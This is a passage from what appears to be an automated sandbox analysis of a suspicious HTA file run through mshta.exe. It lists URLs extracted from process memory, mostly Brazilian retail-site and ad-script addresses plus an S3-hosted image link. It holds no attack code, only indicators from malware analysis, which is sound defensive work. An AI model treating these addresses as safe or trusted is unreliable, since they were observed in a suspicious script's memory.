00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402328770.000000000AC1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25439410877.0000000006807000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478131586.000000000AC1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s3-sa-east-1.amazonaws.com/frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sacola.americanas.com.br/filler-v2
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484520243.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405015002.0000000006ECE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://schema.org
Source: mshta.exe, 00000000.00000003.25388319887.000000000E5B1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490021991.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384395809.000000000E5B1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462814221.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383830981.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376210976.000000000B6FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483822375.00000000093C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486544314.000000000AA7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.000000000304D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25406842009.000000000E5B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js_qV
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsb
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsd
Source: mshta.exe, 00000000.00000003.25400560980.0000000009A37000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400502325.0000000009A35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25434898195.0000000009A3B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400625600.0000000009A38000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400447640.0000000009A34000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400214256.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400340319.0000000009A32000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400683663.0000000009A39000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400391684.0000000009A33000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400274513.0000000009A31000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25416945297.0000000009A3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsq
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.jsrq
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487832586.000000000ABBB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488009024.000000000ABF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/P
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25423005466.0000000009C4E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426174601.0000000009C51000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25434864395.0000000009C52000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/garantia-estendida
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/garantia-estendida.we
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/garantia-estendidar6Rw
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487080902.000000000AAF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404840319.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403359290.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/instalacao-ar-condicionado-split
Source: mshta.exe, 00000000.00000003.25392143865.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443475613.000000000A9B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486282298.000000000A9B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/instalacaocu$D
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487965242.000000000ABDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404712599.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400942493.000000000ABDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25319457300.00000000067A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486225741.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://servicos.americanas.com.br/seguro-roubo-furto
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/seguro-roubo-furto=
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servicos.americanas.com.br/seguro-roubo-furtobp
Source: mshta.exe, 00000000.00000002.25483197472.0000000006F1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486409501.000000000A9C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401639777.000000000AC39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401236979.000000000A9B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401507649.000000000AC06000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-template-americanas-mobile
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398256426.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458668902.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479387385.0000000003003000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484690315.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-foot
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488396530.000000000AC56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477736639.000000000AC54000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404494794.000000000AC54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-glob
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398256426.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458668902.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465598138.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410626125.000000000AA78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459670621.000000000AA7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484690315.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464016855.000000000AA7C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401685590.000000000ABFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://statics-americanas.b2w.io/catalog-statics/acom/public/js/catalogo-ui-americanas-desktop-grid
Source: mshta.exe, 00000000.00000003.25478465499.000000000A9C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398256426.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486323410.000000000A9BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458668902.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403951789.000000000AC3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 